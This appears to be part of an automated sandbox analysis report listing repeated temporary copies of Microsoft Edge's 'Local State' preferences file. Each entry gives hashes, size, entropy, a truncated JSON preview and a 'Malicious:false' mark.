                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF432a5.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43341.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43370.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4338f.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4340c.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45bb9.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45c07.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45fa1.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF48691.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090763686070988
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMOwuF9hDO6vP6O++tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE46/tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:E5CE18B3C11C54F34E1EF7A9935A2546
                                                                                                                                                                                                                                                                                                  SHA1:B2A241D92CEE9B8CDC09D2C3D6FD72640D15D1AE
                                                                                                                                                                                                                                                                                                  SHA-256:527622992E84E8E1EA927802655AF35F3D4E1FC9D89AC60D2FAE32EA7B46D010
                                                                                                                                                                                                                                                                                                  SHA-512:2E112CC3987618C1F3038222BE1A9F8996ECB644EC054D2F43C785CDB07986A79E582561AD5B1EAB2117DC95DF8CAACB2160A668E6F1BBD600220978956F94E5
                                                                                                                                                                                                                                                                                                  Malicious:false
